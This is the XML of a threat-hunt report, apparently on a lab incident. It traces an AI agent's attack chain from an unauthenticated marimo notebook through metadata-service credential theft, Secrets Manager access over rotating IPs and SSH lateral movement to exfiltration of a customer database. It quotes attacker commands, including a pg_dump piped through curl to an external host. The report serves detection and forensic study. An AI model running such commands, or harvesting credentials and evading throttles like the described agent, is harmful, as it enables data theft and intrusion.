                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="167208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LLMAgentLogs_CL. The agent identifies customers as the largest table at 2,841,902 rows, 11:37:42.</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89832"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: Syslog on gf-tg-pg01. connection authorized: user=app database=customers host=10.6.0.20 at 11:40:44." id="19" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: Syslog on gf-tg-pg01. connection authorized: user=app database=customers host=10.6.0.20 at 11:40:44." id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="198983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Syslog on gf-tg-pg01. connection authorized: user=app database=customers host=10.6.0.20 at 11:40:44.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="2l6b06qmhfoy" w:id="16"/>
    <w:bookmarkEnd w:id="16"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.7 Dead ends</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>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Hypothesis tested</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Result</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rejected</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agent-log tool arguments hold the answer</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 tool_args, ...</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Query failed: "Failed to resolve scalar expression named tool_args"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Column does not exist in this table; confirmed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pivoted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tool_result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Discovered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gate_decision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gate_reason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in the same schema check.</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Session summary as written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summarize ..., by session_id, actor, RunId</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Syntax error at token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error on reserved word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Stray comma before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reserved. Corrected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start_time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end_time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CloudTrail logs the throttle</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 \| where isnotempty(ErrorCode)</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rows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ThrottlingException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recorded. The throttle is inferable only from the 24-second gap plus IP change, not from an error row. Feeds the F4 gap.</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SecretId is readable from CloudTrail</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extend SecretId = tostring(parse_json(RequestParameters).secretId)</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Empty in the live pull</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not render the SecretId; secret identity sourced from the agent log instead (second-source corroboration).</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SSH key fingerprint is the login discriminator</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logins=count() by fp</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fingerprint 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logins=1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login carries a distinct fingerprint, so uniqueness does not separate the attacker. Pivoted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TargetUsername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source IP.</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 tables scope on TimeGenerated</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LinuxProcess/Network/Auth ... where TimeGenerated ...</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Returned rows, but off-schema</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dictionary specifies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EventStartTime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those three tables. Corrected in the final evidence queries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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78322"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Dead end: the tool_args column does not exist; this schema error led to the getschema check that surfaced the gate fields." id="20" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Dead end: the tool_args column does not exist; this schema error led to the getschema check that surfaced the gate fields." id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="157832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end: the tool_args column does not exist; this schema error led to the getschema check that surfaced the gate fields.</w:t>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52885"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Dead end resolved: getschema confirms no tool_args, and reveals gate_decision / gate_reason." id="22" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Dead end resolved: getschema confirms no tool_args, and reveals gate_decision / gate_reason." id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="225288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end resolved: getschema confirms no tool_args, and reveals gate_decision / gate_reason.</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66391"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Dead end: a stray comma and the reserved word first broke the session summary; corrected to start_time/end_time." id="23" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Dead end: a stray comma and the reserved word first broke the session summary; corrected to start_time/end_time." id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="196639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end: a stray comma and the reserved word first broke the session summary; corrected to start_time/end_time.</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68845"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Dead end: GetSecretValue error/parameter query returns no rows, establishing the throttle is unlogged." id="24" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Dead end: GetSecretValue error/parameter query returns no rows, establishing the throttle is unlogged." id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="226884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end: GetSecretValue error/parameter query returns no rows, establishing the throttle is unlogged.</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364523"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Dead end: every bastion login has a unique fingerprint (logins=1), so fingerprint uniqueness is not a discriminator." id="25" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Dead end: every bastion login has a unique fingerprint (logins=1), so fingerprint uniqueness is not a discriminator." id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="336452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Dead end: every bastion login has a unique fingerprint (logins=1), so fingerprint uniqueness is not a discriminator.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="q2u2hr63b3tc" w:id="17"/>
    <w:bookmarkEnd w:id="17"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. UTC Timeline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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(UTC)</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Event</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ref</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11:05:00</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/ws/kernel, HTTP 101 upgrade from 198.51.100.23</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ApacheAccess_CL</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 F1</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11:05:02</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names CVE-2026-39987; marimo exposed on 2718 with no token</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7.2, F1</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11:05:06</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python3.12 (PID 5211) spawned by marimo service (PID 3310)</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LinuxProcess_CL</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7.1, F2</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11:08:12</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PID 5211 connects to metadata service 169.254.169.254</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 F3</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11:08:19</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retrieves role credentials for user/svc-notebook</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7.3, F3</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11:11:19 to 11:31:16</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svc-notebook key used across 6 external IPs vs Secrets Manager</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 F4</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11:22:41 to 11:23:05</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Call from .71, then 24s later a resume from .94</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 F4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>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11:31:16</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GetSecretValue retrieval: bastion deploy key retrieved (lab tags ReadOnly=false)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F5</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11:31:22</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chmod 600 /tmp/.c/id_ed25519 (user marimo)</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F5</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11:34:27</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Accepted publickey for deploy from 10.6.0.10 on bastion</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7.5, F6</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11:37:40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psql enumerates database tables by size (deploy account)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F7</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11:37:42</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identifies customers as largest table, 2,841,902 rows</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F7</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11:40:44</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Postgres: connection authorized user=app database=customers host=10.6.0.20</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Syslog</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F7</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11:40:49</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pg_dump of customers piped to curl, 203.0.113.41:8443</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F7</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2026-08-14 11:57:00</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 agent action (exfiltrate); chain ends</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7.6, F7, F8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="1cifji56p0sp" w:id="18"/>
    <w:bookmarkEnd w:id="18"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Findings</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h2r9qvnd2hrl" w:id="19"/>
    <w:bookmarkEnd w:id="19"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F1: Unauthenticated marimo kernel RCE was the entry point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notebook was compromised through an unauthenticated marimo kernel WebSocket (CVE-2026-39987).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ApacheAccess_CL, 2026-08-14 11:05:00,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/ws/kernel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HttpStatus 101, ClientIP 198.51.100.23. Corroborated by LLMAgentLogs_CL, 11:05:02, model_response naming CVE-2026-39987 and "exposed on 2718 with no token." Root cause visible in the marimo launch flags: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/opt/venv/bin/marimo edit --host 0.0.0.0 --port 2718 --no-token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notebook was internet-reachable with authentication disabled, so any external caller could execute code in the kernel. This is the initial access vector for the entire chain.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="4q39z8uehj7y" w:id="20"/>
    <w:bookmarkEnd w:id="20"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F2: Code execution ran as an interpreter under the notebook service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exploit spawned a python3.12 interpreter parented by the marimo service.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LinuxProcess_CL, 2026-08-14 11:05:06, TargetProcessName python3.12, TargetProcessId 5211, ActingProcessName python3.12 (PID 3310, the marimo service).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parent lineage, not the binary name, is what marks this as the attacker's process among the estate's many python3.12 spawns (see F9).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="mdza2bpnkl2i" w:id="21"/>
    <w:bookmarkEnd w:id="21"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F3: The agent stole the notebook's cloud identity via the metadata service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interpreter reached the instance metadata service, and the agent narrated retrieving credentials for the svc-notebook identity. (What can be stated from telemetry is the IMDS connection and the agent's narration; the origin of the AKIA key later used is not established, see the discrepancy below.)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LinuxNetwork_CL, 2026-08-14 11:08:12, ActingProcessId 5211 to DstIpAddr 169.254.169.254. Bounded to the hunt window, ten connections reached the metadata service: nine from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refresh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credential-helper daemon and one from the interpreter (PID 5211).</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003272"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxNetwork_CL, bounded by EventStartTime to the window. 10 metadata reads: python3.12 = 1 (the theft), refresh = 9 (baseline)." id="26" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxNetwork_CL, bounded by EventStartTime to the window. 10 metadata reads: python3.12 = 1 (the theft), refresh = 9 (baseline)." id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1003272"/>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LLMAgentLogs_CL, 11:08:19, "Role credentials retrieved for arn:aws:iam::402913776148:user/svc-notebook." The stolen identity was distinguished from two benign CloudTrail identities (ci-deploy-role from 10.6.0.5, app-role/notebook-app from 10.6.0.12) by confirming it from the agent's own narration, not from the first CloudTrail row.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ATLAS AML.T0098 (AI Agent Tool Credential Harvesting, maturity Realized). The agent used its own execution tooling to harvest cloud credentials from the metadata service.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Discrepancy noted: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metadata service issues temporary role credentials, which carry an ASIA access-key prefix, yet the key later used against Secrets Manager is AKIA4TIDEGLASS0EXAMPLE, a long-lived IAM user key. The agent narrates retrieving role credentials, but the key exercised is a static user key. Either svc-notebook holds a second, static credential the agent also obtained, or the scenario is deliberately inconsistent. The mechanism is not resolved from available telemetry and is recorded as a negative finding and a next-hunt lead rather than smoothed over.</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078509"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: MITRE ATLAS AML.T0098, AI Agent Tool Credential Harvesting, maturity Realized (v2026.09)." id="27" name="image29.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: MITRE ATLAS AML.T0098, AI Agent Tool Credential Harvesting, maturity Realized (v2026.09)." id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3078509"/>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MITRE ATLAS AML.T0098, AI Agent Tool Credential Harvesting, maturity Realized (v2026.09).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="szmmkewah58t" w:id="22"/>
    <w:bookmarkEnd w:id="22"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F4: Secrets access was routed through a six-address egress pool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stolen access key AKIA4TIDEGLASS0EXAMPLE was used against Secrets Manager from six distinct external addresses.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AWSCloudTrail,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dcount(SourceIpAddress) = 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203.0.113.71, .94, .118, .142, .167, .203, in first-seen order. A 24-second gap at 11:22:41 (from .71) resuming at 11:23:05 (from .94).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rotation is a defense-evasion technique (ATT&amp;CK T1090, Proxy) to disguise the source and beat per-source limits, and the calls themselves are abuse of a stolen cloud identity (T1078.004, Valid Accounts: Cloud Accounts, the AKIA svc-notebook key against Secrets Manager). The throttle itself is an inference from the gap-and-resume pattern, not a logged error (see Blind Spots).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throttle-and-continue inference. The rotation is a fact from CloudTrail, but with no logged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ThrottlingException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throttle itself is inferred only from the 24-second gap-plus-IP-change shape, consistent with the Blind Spots note.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="xbkg0ucppy7" w:id="23"/>
    <w:bookmarkEnd w:id="23"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F5: A single GetSecretValue call stole the bastion deploy key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GetSecretValue call retrieved the bastion SSH deploy key; the rest were reconnaissance.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AWSCloudTrail, 2026-08-14 11:31:16, EventName GetSecretValue, from 203.0.113.142. The retrieval is identified by EventName (GetSecretValue is the call that returns secret material; ListSecrets and DescribeSecret only enumerate). Secret confirmed as the bastion deploy key by LLMAgentLogs_CL, 11:31:20, "a deploy key for deploy on the bastion, needs no passphrase."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retrieval is separated from enumeration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(GetSecretValue vs ListSecrets/DescribeSecret).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Discrepancy noted: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workspace tags the theft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ReadOnly=false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inverted from real AWS CloudTrail, where GetSecretValue is a read-only management event and a genuine theft logs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ReadOnly=true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lab's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ReadOnly=false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value is a data artifact and possibly a deliberate discrimination test; a production rule must key on EventName, not ReadOnly, or it would miss every real secret theft. ATT&amp;CK T1555.006 (Cloud Secrets Management Stores), T1078.004 (Valid Accounts: Cloud Accounts).</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669973"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: AWSCloudTrail. GetSecretValue identities: the app-role uses an ASIA session key; the theft uses the svc-notebook AKIA user key." id="28" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: AWSCloudTrail. GetSecretValue identities: the app-role uses an ASIA session key; the theft uses the svc-notebook AKIA user key." id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2669973"/>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AWSCloudTrail. GetSecretValue identities: the app-role uses an ASIA session key; the theft uses the svc-notebook AKIA user key.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="9vfjqx1tpyq6" w:id="24"/>
    <w:bookmarkEnd w:id="24"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F6: The stolen key was used to move laterally to the bastion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deploy key was written to disk on the notebook host and used to SSH into the bastion as the deploy service account.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LinuxShellHistory_CL, 2026-08-14 11:31:22,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chmod 600 /tmp/.c/id_ed25519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(ShellUser marimo, hidden directory). LinuxAuth_CL, 11:34:27,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Accepted publickey for deploy from 10.6.0.10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fingerprint ED25519 SHA256:mNq7xR2vTbY8kLpJ4wZaHc1oUeVgX5tDsQiFj0rWnAE. Same key across the read (11:31:16), the disk write (11:31:22), and the login (11:34:27).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Medium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these three are the same key: CloudTrail cannot expose key material (see Blind Spots), so the link is inferred from the tight timing and the matching deploy-key purpose, not from a shared hash.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ATT&amp;CK T1021.004 (Remote Services: SSH) and T1078.003 (Valid Accounts: Local Accounts), since a stolen key authenticates a valid local service account (deploy) on the bastion. The deploy account is a service account that does not normally log in interactively, and this login originates from the notebook host rather than the developer range, which is what separates it from ~318 legitimate admin logins (see F9).</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601050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxAuth_CL. deploy is one login against the human developer accounts; the account is the discriminator." id="29" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxAuth_CL. deploy is one login against the human developer accounts; the account is the discriminator." id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="260105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LinuxAuth_CL. deploy is one login against the human developer accounts; the account is the discriminator.</w:t>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358008"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxAuth_CL. The deploy login sources from 10.6.0.10 (the notebook host); every human login is 10.6.0.5x." id="1" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxAuth_CL. The deploy login sources from 10.6.0.10 (the notebook host); every human login is 10.6.0.5x." id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="335800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LinuxAuth_CL. The deploy login sources from 10.6.0.10 (the notebook host); every human login is 10.6.0.5x.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="b9g9m2e856pa" w:id="25"/>
    <w:bookmarkEnd w:id="25"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F7: The customer database was enumerated by size, dumped, and exfiltrated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agent selected the largest table (customers, ~2.8M rows) and exfiltrated it compressed to an external destination.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LinuxShellHistory_CL, 2026-08-14 11:37:40,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psql -h 10.6.0.30 -U app -c '\dt+' | sort -k7 -h | tail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LLMAgentLogs_CL, 11:37:42, "customers ... largest object ... at 2841902 rows." LinuxShellHistory_CL, 11:40:49,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 ... -Fc customers | gzip | curl -s -T - https://203.0.113.41:8443/u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Proved from the database's own log: Syslog on gf-tg-pg01, 11:40:44,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 authorized: user=app database=customers host=10.6.0.20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exfil destination 203.0.113.41 sits in the same block as the six egress-pool addresses. Corroborated by LinuxNetwork_CL, 2026-08-14 11:40:49 UTC: an outbound TCP connection from 10.6.0.20:51402 (gf-tg-bastion01, ActorUsername deploy) to 203.0.113.41:8443, ActingProcessName bash (PID 6310). The connection is attributed to the shell that launched the pg_dump pipeline, not to curl. This is the second source for the exfiltration and ties 10.6.0.20 to the bastion. No byte count or session duration is recorded in the table.</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07566"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxNetwork_CL. Outbound TCP 10.6.0.20:51402 (bastion, deploy) to 203.0.113.41:8443 at 11:40:49.336, ActingProcessName bash (PID 6310). Confirms the upload connection; no bytes/duration field is present." id="2" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxNetwork_CL. Outbound TCP 10.6.0.20:51402 (bastion, deploy) to 203.0.113.41:8443 at 11:40:49.336, ActingProcessName bash (PID 6310). Confirms the upload connection; no bytes/duration field is present." id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="220756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LinuxNetwork_CL. Outbound TCP 10.6.0.20:51402 (bastion, deploy) to 203.0.113.41:8443 at 11:40:49.336, ActingProcessName bash (PID 6310). Confirms the upload connection; no bytes/duration field is present.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ATT&amp;CK T1213.006 (Data from Information Repositories: Databases, which lists PostgreSQL among its example databases; MITRE's own detection strategy for it describes psql access by non-admin users followed by data dumps and external connections, which matches this step) and T1567.002 (Exfiltration Over Web Service). Separated from the nightly backup, shown from telemetry rather than asserted. A day-scoped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query returns 20 legitimate backup runs plus the one theft. The backup runs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ShellUser = backup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gf-tg-pg01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(localhost), dumping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greenfield_platform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database to a local path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/backup/nightly/greenfield_platform.dump.gz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 schedule throughout the day. The theft is the single row that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ShellUser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gf-tg-bastion01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dumping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customers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database to an external upload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curl https://203.0.113.41:8443/u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Four fields differ: account, host, database, and destination. Backup runs at 11:39:09 and 11:57:32 bracket the theft at 11:40:49, which is exactly why it could be mistaken for the nightly job. One timing note: the Postgres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 authorized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 (11:40:44) precedes the shell-history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entry (11:40:49) by five seconds; shell-history ingestion can lag the live connection, so the DB log is the earlier and more authoritative timestamp.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the customers dump was sent to 203.0.113.41, from the shell command and the matching outbound connection at the same second (11:40:49). Transfer completion and volume are not observed in telemetry.</w:t>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813867"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxShellHistory_CL, day-scoped. 20 legitimate backup runs (backup@gf-tg-pg01, greenfield_platform, local path) bracket the single theft (deploy@gf-tg-bastion01, customers, external curl) at 11:40:49." id="3" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxShellHistory_CL, day-scoped. 20 legitimate backup runs (backup@gf-tg-pg01, greenfield_platform, local path) bracket the single theft (deploy@gf-tg-bastion01, customers, external curl) at 11:40:49." id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1813867"/>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LinuxShellHistory_CL, day-scoped. 20 legitimate backup runs (backup@gf-tg-pg01, greenfield_platform, local path) bracket the single theft (deploy@gf-tg-bastion01, customers, external curl) at 11:40:49.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="ckl72pjb2eve" w:id="26"/>
    <w:bookmarkEnd w:id="26"/>
